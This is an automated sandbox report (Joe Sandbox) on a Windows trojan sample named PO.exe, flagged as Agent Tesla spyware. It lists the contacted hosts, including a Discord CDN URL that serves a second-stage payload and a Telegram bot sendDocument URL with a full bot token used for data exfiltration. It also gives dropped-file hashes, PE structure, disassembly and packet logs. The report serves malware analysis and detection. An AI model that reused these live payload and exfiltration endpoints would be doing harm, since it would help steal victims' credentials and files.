            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            https://sFTel9k7EYFPshk.com0%Avira URL Cloudsafe
            http://bLCeYs.com0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            cdn.discordapp.com
            162.159.133.233
            truefalse
              high
              api.telegram.org
              149.154.167.220
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://cdn.discordapp.com/attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocxfalse
                  high
                  https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocumentfalse
                    high
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://127.0.0.1:HTTP/1.1CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://DynDns.comDynDNSCasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://api.telegram.orgCasPol.exe, 00000004.00000002.89339592068.000000001D9C0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.89340758768.000000001DA29000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocumentdocument-----CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://sFTel9k7EYFPshk.comCasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.89339798750.000000001D9D4000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://cdn.discordapp.com/CasPol.exe, 00000004.00000002.89316980207.00000000014CB000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://nsis.sf.net/NSIS_ErrorErrorPO.exefalse
                              high
                              https://sFTel9k7EYFPshk.comt-WlCasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://api.telegram.orgCasPol.exe, 00000004.00000002.89339798750.000000001D9D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCasPol.exe, 00000004.00000002.89339592068.000000001D9C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://bLCeYs.comCasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://cdn.discordapp.com/attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocxTCasPol.exe, 00000004.00000002.89317391968.0000000001506000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://cdn.discordapp.com/attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocxtCasPol.exe, 00000004.00000002.89317391968.0000000001506000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      149.154.167.220
                                      api.telegram.orgUnited Kingdom
                                      62041TELEGRAMRUfalse
                                      162.159.133.233
                                      cdn.discordapp.comUnited States
                                      13335CLOUDFLARENETUSfalse
                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                      Analysis ID:756266
                                      Start date and time:2022-11-29 22:45:33 +01:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 14m 28s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:PO.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                      Run name:Suspected Instruction Hammering
                                      Number of analysed new started processes analysed:8
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@4/7@2/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:
                                      • Successful, ratio: 34.2% (good quality ratio 33.7%)
                                      • Quality average: 87.7%
                                      • Quality standard deviation: 21.4%
                                      HCA Information:
                                      • Successful, ratio: 98%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                      • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                      • TCP Packets have been reduced to 100
                                      • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, wdcp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      No simulations
                                      No context
                                      No context
                                      No context
                                      No context
                                      No context
                                      Process:C:\Users\user\Desktop\PO.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):169298
                                      Entropy (8bit):6.993422708563822
                                      Encrypted:false
                                      SSDEEP:3072:3H36doFRBxbYjEigfKAFBx4klY9HcLYO6P7tbLkXlBDPn4rrHIRqkFjOjz:XHRojYfLqkqFZbSjDKrSnpOH
                                      MD5:E9CD51B8DF0E079A6D84286C4F8FB583
                                      SHA1:30BB91305F4BAD22563D16D837405BD105982218
                                      SHA-256:B1DFFFB8EE9D8CB22BF5C8660D793719ACFEC38A08F2A78E90EE8D4067512159
                                      SHA-512:D33B5DED1B891A2BEB68B0127FFB8E0B30AE3856877F7BEF93D42440D15FFEF6EADC8007137E0BC1B1257CB09777344B22773CEA9F9FDDC81FBDAC3A66DF65AD
                                      Malicious:false
                                      Reputation:low
                                      Preview:.:.V,:.. E....-^,z..3U.g...v.Q.sY..x.....@...m|..I...V.y...@.....S.....G.+...UQg5...@..:..o8.v.j.5.<../..3..0,E.b.v...._...h..b...J.M..._.E/x24.K...\.R......X.~...._4..%...2\.....:6.5.>E...N&j)yc.F....o....R.tZZ.F.UW....0.........N.,GTMj.......I........[{..0U..4..3..,.l$..}.g.&.u..!.".lstg.5..{..~az..U..J.....j.c[...z.j./...!m.......Cy.U....X.. 9...@..V$...M..*%...O.@..V5......+".}.4.>.....<..e..........;..b9;"D...&E.....A_Q.%..^..t.N&1^....c.....G..h=H.....?.....W.......`.4..,..3.IaaH.B.ZmB....f.J.....a..(p.-X..*...f..W.'.D(O...,..4..cG............/G./..^....6X..x.CD{\g.....{...F:..4...tJ>J..=..#K...-............v...f....J.=7@oM.e.$l..U..m..<..:.O6.,...\.Y|[do.8.w....#]2..f.. ....[...J....g.h`.....Q.f.C_..T...iIR.....A..%t._6fYH.]g.....o.i.c..U.H...h....M...@.n...9.[t.X.....o......t......%PWY.t@..Ce..WG.%.l..b}eF....B.6K.N....Qf.C.P....f....2.>.#...3.5Y.=...d..3......\f.J..9S.16bQ...}..'.g..M.l.B^e\.8...A.L....v.p..u......:....Y~t...i...
                                      Process:C:\Users\user\Desktop\PO.exe
                                      File Type:SVG Scalable Vector Graphics image
                                      Category:dropped
                                      Size (bytes):314
                                      Entropy (8bit):4.555782614723155
                                      Encrypted:false
                                      SSDEEP:6:TMVBd/6o8GUYl/n7S3mc4slLlNkRI7NtAlaRI7SdtAlaRI7UNtAlBC:TMHdPnnl/nu3tln7NWlz7MWlz7UNWlM
                                      MD5:53C42FCA9E64A93B4C572D5BA805FD4D
                                      SHA1:1659423CA8F981CFD2EEB6ADD25C03CA5B37FFBD
                                      SHA-256:DD3F1C117437A6F5124905DE7212A1A320E76F9B33D8411BF70DBDBEFA8E9BAD
                                      SHA-512:2852EB784E5090F298259F04516C1413734ECF20EA7D143864FE0312A6410E83FFF49E16DCE3CF7F61177238B4DECEBD540FD839E3721965A5141856908392DD
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <g fill="#2e3436">. <path d="m 1 2 h 14 v 2 h -14 z m 0 0"/>. <path d="m 1 7 h 14 v 2 h -14 z m 0 0"/>. <path d="m 1 12 h 14 v 2 h -14 z m 0 0"/>. </g>.</svg>.
                                      Process:C:\Users\user\Desktop\PO.exe
                                      File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                      Category:dropped
                                      Size (bytes):850
                                      Entropy (8bit):2.925859933343773
                                      Encrypted:false
                                      SSDEEP:12:8gl0gsXUCV/tz+7RafgKD7mWH/rNJkKAh4t2YCBTo8:8/raRMgKh5HALJT
                                      MD5:AF9FC18C6E2F55A80586FD4B43D24674
                                      SHA1:482192CAF81B1E06F761929AFF7CAADB8D91328A
                                      SHA-256:500184B06DBC9F859D31AF68D726A7C282D6016E1ABE241A80BF4119C1A073F7
                                      SHA-512:9DFE5CA18F0E68C868BDE1C0ADC5CB20B38C0D08570769935D1EE53803E4D33E1E949C422FD80F395B250A897219339F97D7198ADDEB86A94A887084D8EA76CF
                                      Malicious:false
                                      Reputation:low
                                      Preview:L..................F........................................................#....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....\.2...........TOBEN.txt.D............................................T.O.B.E.N...t.x.t...........\.T.O.B.E.N...t.x.t.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................
                                      Process:C:\Users\user\Desktop\PO.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:modified
                                      Size (bytes):11776
                                      Entropy (8bit):5.6557532861400945
                                      Encrypted:false
                                      SSDEEP:192:eK24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlASl:u8QIl975eXqlWBrz7YLOlA
                                      MD5:0FF2D70CFDC8095EA99CA2DABBEC3CD7
                                      SHA1:10C51496D37CECD0E8A503A5A9BB2329D9B38116
                                      SHA-256:982C5FB7ADA7D8C9BC3E419D1C35DA6F05BC5DD845940C179AF3A33D00A36A8B
                                      SHA-512:CB5FC0B3194F469B833C2C9ABF493FCEC5251E8609881B7F5E095B9BD09ED468168E95DDA0BA415A7D8D6B7F0DEE735467C0ED8E52B223EB5359986891BA6E2E
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:moderate, very likely benign file
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....z.W...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 36, database pages 24, 1st free page 14, free pages 11, cookie 0x5, schema 4, UTF-8, version-valid-for 36
                                      Category:dropped
                                      Size (bytes):98304
                                      Entropy (8bit):2.9216957692876595
                                      Encrypted:false
                                      SSDEEP:384:ST8XNcKu0iTwbAziYN570RMZXVuKnQM2V6ofbDO4xmTgZcZygSA2O9RVHfwrhhxV:JNcgiD5Q6luKQM2V7DXcAgSA2KD4jL
                                      MD5:1A706D20E96086886B5D00D9698E09DF
                                      SHA1:DACF81D90647457585345BEDD6DE222E83FDE01F
                                      SHA-256:759F62B61AA65D6D5FAC95086B26D1D053CE1FB24A8A0537ACB42DDF45D2F19F
                                      SHA-512:CFF7D42AA3B089759C5ACE934A098009D1A58111FE7D99AC7669B7F0A1C973907FD16A4DC1F37B5BE5252EC51B8D876511F4F6317583FA9CC48897B1B913C7F3
                                      Malicious:false
                                      Preview:SQLite format 3......@ ...$...................................................................$..S`.........g.....[.[.[................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                      Category:modified
                                      Size (bytes):98304
                                      Entropy (8bit):0.08231524779339361
                                      Encrypted:false
                                      SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                                      MD5:886A5F9308577FDF19279AA582D0024D
                                      SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                                      SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                                      SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):30
                                      Entropy (8bit):3.964735178725505
                                      Encrypted:false
                                      SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                      MD5:9F754B47B351EF0FC32527B541420595
                                      SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                      SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                      SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                      Malicious:false
                                      Preview:NordVPN directory not found!..
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):6.435141913006391
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:PO.exe
                                      File size:269537
                                      MD5:9297126fd9624f7dc2d4f64f072668a2
                                      SHA1:c30b3c8fddd49f7dfba687026daf6293f6d90b1b
                                      SHA256:edd8e1858bcc704fdea75837bb448eceda61317e7f8028e82aa2a0e5559c658a
                                      SHA512:57fd81274b3f16cb8f0056c9afe2c697649db154c12e63a4ed8bad65ccb6b598845adce9883bd2695335e05e8f3c877fc9f2e32a637c01e170d0b671e32c6d0b
                                      SSDEEP:6144:DB+pqUiH1YF0tV1R5nqyw8TqwiV6lMATl:DgcHyF+Hqyw83iLATl
                                      TLSH:39448B147A6CE127F11AC6709B52AD1B7E783F040865D203BEC4FB5E353B14299FA26B
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....z.W.................b...*.......3............@
                                      Icon Hash:b474f4c4c4c4c4d4
                                      Entrypoint:0x4033b6
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x57017AB0 [Sun Apr 3 20:18:56 2016 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:4ea4df5d94204fc550be1874e1b77ea7
                                      Instruction
                                      sub esp, 000002D4h
                                      push ebx
                                      push esi
                                      push edi
                                      push 00000020h
                                      pop edi
                                      xor ebx, ebx
                                      push 00008001h
                                      mov dword ptr [esp+14h], ebx
                                      mov dword ptr [esp+10h], 0040A230h
                                      mov dword ptr [esp+1Ch], ebx
                                      call dword ptr [004080B4h]
                                      call dword ptr [004080B0h]
                                      cmp ax, 00000006h
                                      je 00007FFA70B1BD33h
                                      push ebx
                                      call 00007FFA70B1EE8Ch
                                      cmp eax, ebx
                                      je 00007FFA70B1BD29h
                                      push 00000C00h
                                      call eax
                                      mov esi, 004082B8h
                                      push esi
                                      call 00007FFA70B1EE06h
                                      push esi
                                      call dword ptr [0040815Ch]
                                      lea esi, dword ptr [esi+eax+01h]
                                      cmp byte ptr [esi], 00000000h
                                      jne 00007FFA70B1BD0Ch
                                      push ebp
                                      push 00000009h
                                      call 00007FFA70B1EE5Eh
                                      push 00000007h
                                      call 00007FFA70B1EE57h
                                      mov dword ptr [0042A244h], eax
                                      call dword ptr [0040803Ch]
                                      push ebx
                                      call dword ptr [004082A4h]
                                      mov dword ptr [0042A2F8h], eax
                                      push ebx
                                      lea eax, dword ptr [esp+34h]
                                      push 000002B4h
                                      push eax
                                      push ebx
                                      push 004216E8h
                                      call dword ptr [00408188h]
                                      push 0040A384h
                                      push 00429240h
                                      call 00007FFA70B1EA40h
                                      call dword ptr [004080ACh]
                                      mov ebp, 00435000h
                                      push eax
                                      push ebp
                                      call 00007FFA70B1EA2Eh
                                      push ebx
                                      call dword ptr [00408174h]
                                      add word ptr [eax], 0000h
                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x6c0000x19f28.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x615d0x6200False0.6616709183673469data6.45041359169741IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x80000x13a40x1400False0.4529296875data5.163001655755973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0xa0000x203380x600False0.5026041666666666data3.9824009583068882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .ndata0x2b0000x410000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x6c0000x19f280x1a000False0.062424879807692304data2.7337265494354486IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountry
                                      RT_BITMAP0x6c3580x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States
                                      RT_ICON0x6c6c00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States
                                      RT_ICON0x7cee80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States
                                      RT_ICON0x811100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States
                                      RT_ICON0x836b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States
                                      RT_ICON0x847600x9eePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                      RT_ICON0x851500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States
                                      RT_DIALOG0x855b80x144dataEnglishUnited States
                                      RT_DIALOG0x857000x13cdataEnglishUnited States
                                      RT_DIALOG0x858400x100dataEnglishUnited States
                                      RT_DIALOG0x859400x11cdataEnglishUnited States
                                      RT_DIALOG0x85a600xc4dataEnglishUnited States
                                      RT_DIALOG0x85b280x60dataEnglishUnited States
                                      RT_GROUP_ICON0x85b880x5adataEnglishUnited States
                                      RT_MANIFEST0x85be80x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States
                                      DLLImport
                                      KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                      USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                      SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                      ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      192.168.11.20149.154.167.220498544432851779 11/29/22-22:50:36.593124TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49854443192.168.11.20149.154.167.220
                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 29, 2022 22:48:56.877616882 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:56.877716064 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:56.877887964 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:56.908607960 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:56.908684015 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:56.957823992 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:56.958023071 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.067698002 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.067722082 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.068057060 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.068178892 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.072216988 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.112457991 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.136059046 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.136152029 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.136217117 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.136225939 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.136249065 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.136323929 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.136369944 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.136431932 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.136507988 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.136516094 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.136528015 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.136554956 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.136635065 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.136635065 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.136694908 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.136826992 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.136826992 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.136838913 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.136847973 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.137010098 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.137010098 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.137022972 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.137036085 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.137248993 CET49847443192.168.11.20162.159.133.233
